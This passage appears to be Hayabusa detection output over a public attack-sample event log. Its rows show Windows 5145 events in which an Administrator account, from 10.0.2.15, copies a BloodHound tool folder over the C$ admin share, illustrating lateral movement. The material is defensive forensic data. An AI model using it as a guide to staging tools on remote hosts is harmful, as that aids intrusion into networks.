Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.277 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\bootstrap\grunt : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.277 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\bootstrap\js : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.287 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\bootstrap\less : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.287 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\bootstrap\less\mixins : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.297 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator 
: Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\bootstrap-3-typeahead : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.297 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\bowser : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.297 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\bowser\.idea : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.307 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\bowser\.idea\inspectionProfiles : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.307 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: 
Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\bowser\.idea\markdown-navigator : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.307 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\bowser\src : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.307 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\bowser\test : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.307 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\brace-expansion : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.317 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\buffer-from : IP Address: 
10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.317 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\buffer-indexof-polyfill : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.317 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\buffer-indexof-polyfill\test : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.317 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\buffers : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.327 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\buffers\examples : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral 
Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.327 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\buffers\test : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.327 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\buffer-shims : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.327 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\cfb : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.337 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\cfb\bin : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.337 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share 
Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\cfb\dist : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.337 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\cfb\types : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.337 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\chainsaw : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.347 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\chainsaw\examples : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.347 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\chainsaw\test : IP Address: 
10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.347 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\classnames : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.347 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\codepage : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.357 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\codepage\bin : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.357 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\codepage\dist : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral 
Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.357 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\colors : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.357 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\colors\themes : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.367 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\commander : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.367 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\commander\typings : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.367 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: 
\\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\concat-map : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.367 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\concat-map\example : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.377 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\concat-map\test : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.377 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\concat-stream : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.377 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\conf : IP Address: 
10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.377 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.387 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\build : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.387 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\client : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.387 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\core : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral 
Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.387 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\es5 : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.397 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\es6 : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.397 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\es7 : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.397 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\fn : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.407 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: 
\\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\fn\array : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.407 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\fn\date : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.407 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\fn\dom-collections : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.407 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\fn\error : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.418 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: 
Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\fn\function : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.418 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\fn\json : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.418 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\fn\map : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.418 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\fn\math : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.428 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\fn\number : IP Address: 
10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.428 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\fn\object : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.428 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\fn\promise : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.438 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\fn\reflect : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.438 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\fn\regexp : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral 
Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.438 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\fn\set : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.448 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\fn\string : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.448 